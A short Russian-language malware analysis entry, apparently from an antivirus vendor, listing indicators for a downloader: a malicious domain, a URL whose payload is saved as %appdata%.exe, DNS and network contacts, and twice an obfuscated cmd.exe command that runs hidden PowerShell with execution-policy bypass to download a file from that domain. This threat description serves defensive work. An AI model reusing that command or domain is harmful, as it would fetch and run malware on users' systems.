Техническая информация
- http://aloepolera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "powe^r^SH^elL^.E^Xe -Ex^ecuTI^OnP^OLICy^ ^BYpaS^s ^-^no^P^R^oFI^LE -^Wi^NdoWS^T^Yl^E Hi^Dd^e^n (^nEw^-OBJecT systEm^.^Net^.we^bcL^ie^nt).^doW^nLoAdfILe^('http://aloepolera.t...
- %APPDATA%.exe
- 'al###olera.top':80
- http://al###olera.top/read.php?f=#####
- DNS ASK al###olera.top
- '<SYSTEM32>\cmd.exe' /C "powe^r^SH^elL^.E^Xe -Ex^ecuTI^OnP^OLICy^ ^BYpaS^s ^-^no^P^R^oFI^LE -^Wi^NdoWS^T^Yl^E Hi^Dd^e^n (^nEw^-OBJecT systEm^.^Net^.we^bcL^ie^nt).^doW^nLoAdfILe^('http://aloepolera.t...' (со скрытым окном)